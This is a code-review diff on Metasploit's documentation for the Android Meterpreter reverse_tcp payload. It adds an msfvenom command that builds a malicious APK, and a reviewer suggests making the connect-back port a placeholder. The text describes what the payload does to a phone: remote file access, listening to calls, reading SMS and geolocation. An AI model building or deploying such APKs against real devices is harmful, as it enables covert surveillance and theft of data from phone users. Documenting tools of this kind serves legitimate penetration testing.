documentation/modules/payload/android/meterpreter/reverse_tcp.md

```diff
@@ -4,6 +4,29 @@ do with it already.
 
 The Android Meterpreter allows you to do things like take remote control the file system, listen to phone calls, retrieve or send SMS messages, geo-locate the user, run post-exploitation modules, etc.
 
+
+### To create the APK with msfvenom:
+
+```
+./msfvenom -p android/meterpreter/reverse_tcp LHOST=[IP] LPORT=4444 -f raw -o /tmp/android.apk
```

Comment:
```suggestion
./msfvenom -p android/meterpreter/reverse_tcp LHOST=[IP] LPORT=[PORT TO CONNECT BACK ON] -f raw -o /tmp/android.apk
```

Don't want to limit this to just one port or give the impression that it has to be set to a specific value.